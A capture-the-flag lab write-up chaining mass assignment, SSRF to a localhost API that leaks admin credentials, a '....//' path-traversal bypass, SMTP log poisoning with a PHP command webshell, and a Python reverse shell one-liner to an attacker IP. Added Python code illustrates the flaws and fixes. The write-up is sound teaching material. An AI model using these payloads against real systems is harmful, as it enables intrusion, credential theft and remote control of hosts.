Challenge
"Even if it's not accessible from the browser, can you still find a way to capture the flags and sneak into the secret admin panel?"
Information gathering
Port scan
nmap -p- 10.80.189.83

(The output below carries service versions and NSE script results, so version detection and the default scripts, -sV -sC, were evidently enabled in addition to -p-.)

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
25/tcp    open  smtp     Postfix smtpd
|_smtp-commands: mail.filepath.lab, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
|_ssl-date: TLS randomness does not represent time
110/tcp   open  pop3     Dovecot pop3d
|_pop3-capabilities: UIDL SASL TOP STLS AUTH-RESP-CODE CAPA RESP-CODES PIPELINING
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
143/tcp   open  imap     Dovecot imapd (Ubuntu)
|_imap-capabilities: SASL-IR ENABLE more IMAP4rev1 post-login ID LOGINDISABLEDA0001 Pre-login OK capabilities IDLE listed STARTTLS LITERAL+ have LOGIN-REFERRALS
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
993/tcp   open  ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: SASL-IR ENABLE more AUTH=PLAIN post-login ID AUTH=LOGINA0001 Pre-login OK IMAP4rev1 IDLE listed capabilities LITERAL+ have LOGIN-REFERRALS
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
995/tcp   open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: UIDL SASL(PLAIN LOGIN) TOP USER AUTH-RESP-CODE CAPA RESP-CODES PIPELINING
| ssl-cert: Subject: commonName=ip-10-10-31-82.eu-west-1.compute.internal
| Subject Alternative Name: DNS:ip-10-10-31-82.eu-west-1.compute.internal
| Not valid before: 2021-11-10T16:53:34
|_Not valid after:  2031-11-08T16:53:34
4000/tcp  open  http     Node.js (Express middleware)
|_http-title: Sign In
50000/tcp open  http     Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: System Monitoring Portal
Service Info: Host: mail.filepath.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Two web services stand out: a Node.js/Express application on 4000 (title "Sign In") and a PHP application behind Apache on 50000 (title "System Monitoring Portal", PHPSESSID cookie without the HttpOnly flag). The mail stack, Postfix on 25 with VRFY enabled and Dovecot POP3/IMAP, becomes relevant later.

flag1
On port 4000 we find the following:
On port 50000 we find this page:
This is a system monitoring (SysMon) portal. It carries the following notice:
Note: This website is intended for authorized personnel only. Be advised that every action and request within this system is subject to monitoring and logging. Unauthorized access or misuse of this portal will be addressed in accordance with company policies and applicable laws.
There is also a login page.
Ran a directory brute force. Nothing turned up on 4000.
Nothing of interest on 50000 either.
Back to port 4000, where the landing page is the sign-in form.
Only now did I notice the guest account credentials displayed on the page. I had overlooked them earlier, which is embarrassing.
Log in with them.
After looking around, the profile view gives a clue: an isAdmin field!
Below the profile there is another function.
Whatever is "recommended" through it shows up in the section above.
So we guess the parameters of that request can be modified as well.
Try changing the name.
It can be modified!
Now change isAdmin in the same request.
An extra API feature appears! This is mass assignment: the update handler copies whatever fields the client sends into the stored user record, isAdmin included, instead of restricting updates to the fields the form is meant to edit.
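The pattern behind the isAdmin overwrite, as an added Python illustration: this is neither the writeup's code nor the Express application on port 4000, whose update handler we never see. The vulnerable function merges the whole request body into the user; the safe one copies only an allow-list of fields. The allow-listed field names and the sample guest record are assumptions.

```python
# Added example, not code from the target application: mass assignment in a
# profile-update handler, beside the allow-listed fix.

# Assumed set of fields the profile form is meant to edit
ALLOWED_PROFILE_FIELDS = {"name", "email", "bio"}


def update_profile_vulnerable(user: dict, body: dict) -> dict:
    """Assumed behaviour of the vulnerable handler: every key in the request
    body overwrites the stored record, so isAdmin (or role, id, ...) is accepted."""
    updated = dict(user)
    updated.update(body)
    return updated


def update_profile_safe(user: dict, body: dict) -> dict:
    """Fix: copy only allow-listed keys; server-controlled fields such as
    isAdmin can never be set from the client side."""
    updated = dict(user)
    for key in ALLOWED_PROFILE_FIELDS:
        if key in body:
            updated[key] = body[key]
    return updated


def find_privileged_keys(body: dict, allowed=ALLOWED_PROFILE_FIELDS) -> set:
    """Detection helper: which submitted keys fall outside the allow-list?
    Logging these on the server is a cheap tamper signal."""
    return set(body) - set(allowed)


# Constructed sample data: the guest's record and the tampered "change name" request
GUEST = {"id": 7, "name": "guest", "isAdmin": False}
TAMPERED_BODY = {"name": "guest", "isAdmin": True}

if __name__ == "__main__":
    print(update_profile_vulnerable(GUEST, TAMPERED_BODY))  # isAdmin flips to True
    print(update_profile_safe(GUEST, TAMPERED_BODY))        # isAdmin stays False
    print(find_privileged_keys(TAMPERED_BODY))              # {'isAdmin'}
```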
Visiting it shows the following.
Tidied up, the API documentation reads:

Internal API

GET http://127.0.0.1:5000/internal-api HTTP/1.1
Host: 127.0.0.1:5000

Response:
{
  "secretKey": "superSecretKey123",
  "confidentialInfo": "This is very confidential."
}

Get Admins API

GET http://127.0.0.1:5000/getAllAdmins101099991 HTTP/1.1
Host: 127.0.0.1:5000

Response:
{
  "ReviewAppUsername": "admin",
  "ReviewAppPassword": "xxxxxx",
  "SysMonAppUsername": "administrator",
  "SysMonAppPassword": "xxxxxxxxx",
}

So port 5000 is only reachable from the host itself: requests to it must originate from 127.0.0.1, which our browser cannot do directly. The passwords are masked in the documentation, so we need the server to fetch these endpoints for us.
After changing isAdmin, the settings area shows this page:
This is clearly where we get to make the SSRF request!
Put the endpoint http://127.0.0.1:5000/internal-api into it.
After sending, the result is:
That looks like base64, so decode it.

eyJzZWNyZXRLZXkiOiJzdXBlclNlY3JldEtleTEyMyIsImNvbmZpZGVudGlhbEluZm8iOiJUaGlzIGlzIHZlcnkgY29uZmlkZW50aWFsIGluZm9ybWF0aW9uLiBIYW5kbGUgd2l0aCBjYXJlLiJ9

Decoded:

{"secretKey":"superSecretKey123","confidentialInfo":"This is very confidential information. Handle with care."}

From this we infer that after every SSRF request the fetched response is written back, base64-encoded, to the /admin/settings page.
Now send the admin API endpoint we found in the documentation!

http://127.0.0.1:5000/getAllAdmins101099991

Result:

eyJSZXZpZXdBcHBVc2VybmFtZSI6ImFkbWluIiwiUmV2aWV3QXBwUGFzc3dvcmQiOiJhZG1pbkAhISEiLCJTeXNNb25BcHBVc2VybmFtZSI6ImFkbWluaXN0cmF0b3IiLCJTeXNNb25BcHBQYXNzd29yZCI6IlMkOSRxazZkIyoqTFFVIn0=

Decoded:

{"ReviewAppUsername":"admin","ReviewAppPassword":"admin@!!!","SysMonAppUsername":"administrator","SysMonAppPassword":"S$9$qk6d#**LQU"}

We now have the administrator password for SysMonApp, as well as the admin password for the Review app!

ReviewAppUsername: admin
ReviewAppPassword: admin@!!!
SysMonAppUsername: administrator
SysMonAppPassword: S$9$qk6d#**LQU

Log in to the page on port 50000 with the SysMonApp credentials.
That gives flag1:
THM{!50_55Rf_1S_d_k3Y??!}

flag2
Kept exploring. After checking many places, the suspicious item turned up in the page source: note profile.php!
Tried requesting it; the result is promising. Since the parameter is not simply rendered as an image, it may allow reading local files.
Many variants failed; the bypass payload that finally worked is:

....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd

The filter evidently strips "../" once, non-recursively: each "....//" loses its inner "../" and collapses to "../", which is why a plain "../" sequence is neutralised while this doubled form survives. Reading passwd shows two users:
joshua and charles. Tried reading their SSH private keys through the same include; as expected, that does not work.
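Why the doubled form gets through, as an added Python example (not the target's profile.php, which we never see, and not the writeup's own code). The filter is assumed to be a single non-recursive replace of "../", the simplest behaviour consistent with "../" failing and "....//" working; the image directory that profile.php prefixes to the parameter is likewise an assumption. The last function shows the allow-list check that should have been used instead.

```python
# Added example, not the target's code: a single-pass "../" strip, the
# traversal it lets through, and the canonicalise-then-prefix-check fix.
import posixpath

# Assumed directory that profile.php prefixes to the img parameter
IMG_BASE = "/var/www/html/images"
PAYLOAD = "....//" * 15 + "etc/passwd"   # the payload used in the writeup


def strip_once(path: str) -> str:
    """Assumed filter: str.replace removes each '../' a single time, scanning
    left to right, so '....//' loses its middle '../' and becomes '../'."""
    return path.replace("../", "")


def vulnerable_include_path(user_path: str) -> str:
    """What a filter-then-include handler ends up opening."""
    return posixpath.normpath(posixpath.join(IMG_BASE, strip_once(user_path)))


def strip_recursive(path: str) -> str:
    """Blacklist done idempotently: repeat until no '../' remains. Better than
    strip_once, but still a blacklist (encoding variants remain a risk)."""
    while "../" in path:
        path = path.replace("../", "")
    return path


def resolve_under_base(base: str, user_path: str):
    """Allow-list approach: canonicalise, then require the result to stay
    under base. Returns the resolved path, or None if it escapes. Uses pure
    string logic (posixpath) so it runs without the files existing; on a live
    server resolve with os.path.realpath so symlinks cannot defeat the check."""
    candidate = posixpath.normpath(posixpath.join(base, user_path))
    base = base.rstrip("/")
    if candidate == base or candidate.startswith(base + "/"):
        return candidate
    return None


if __name__ == "__main__":
    print(strip_once("../../etc/passwd"))                      # etc/passwd (filter wins)
    print(strip_once(PAYLOAD))                                 # ../ repeated 15 times + etc/passwd
    print(vulnerable_include_path(PAYLOAD))                    # /etc/passwd
    print(resolve_under_base(IMG_BASE, strip_once(PAYLOAD)))   # None (rejected)
```

Note that the raw payload is harmless without the buggy filter: "...." is just an odd directory name, so resolve_under_base keeps it under IMG_BASE. It is the filter itself that manufactures the traversal.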
Let's take stock: we pivoted from port 4000 to port 50000, and now we have a local file inclusion, although it appears to be restricted. LFI is usually chained with something that writes attacker-controlled content to disk, such as a file upload with an image webshell. With this many services on the box, the intended chain is probably log file inclusion!
Try reading the logs of the services found earlier.
First SSH (port 22):
http://10.80.189.83:50000/profile.php?img=....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//var/log/auth.log
Then the mail server:
http://10.80.189.83:50000/profile.php?img=....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//var/log/mail.log
First try to plant the shell via SSH, i.e. poison auth.log with a PHP payload.
That does not work: it is restricted and nothing gets logged.
Switch to the mail server instead.
Connect with nc:

nc -nv 10.80.189.83 25

Try writing the shell into the log through the recipient address:

HELO attacker.com
MAIL FROM:<test@test.com>
RCPT TO:<?php system($_GET['cmd']); ?>
DATA
Subject: Test Log Injection

This is a test.
.
QUIT

Postfix rejects this recipient, but it records the rejected address verbatim in /var/log/mail.log; that is all we need, because profile.php includes the file and PHP executes any <?php ... ?> tags it contains. The DATA stage is not even required, since the reject line is written when the RCPT command is processed. Now include the log, passing the command in the cmd parameter:

http://10.80.189.83:50000/profile.php?img=....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//var/log/mail.log&cmd=id

The output of id comes back in the response: code execution!
Now go for a reverse shell.
On the attacking host, start a listener: nc -lvnp 4444. I tried several reverse shell one-liners; the Python one, passed URL-encoded in the cmd parameter, is the one that connected back:

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.80.103.9",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

Under the directory we land in there is an extremely long file; it contains the final flag.
THM{505eb0fb8a9f32853b4d955e1f9123ea}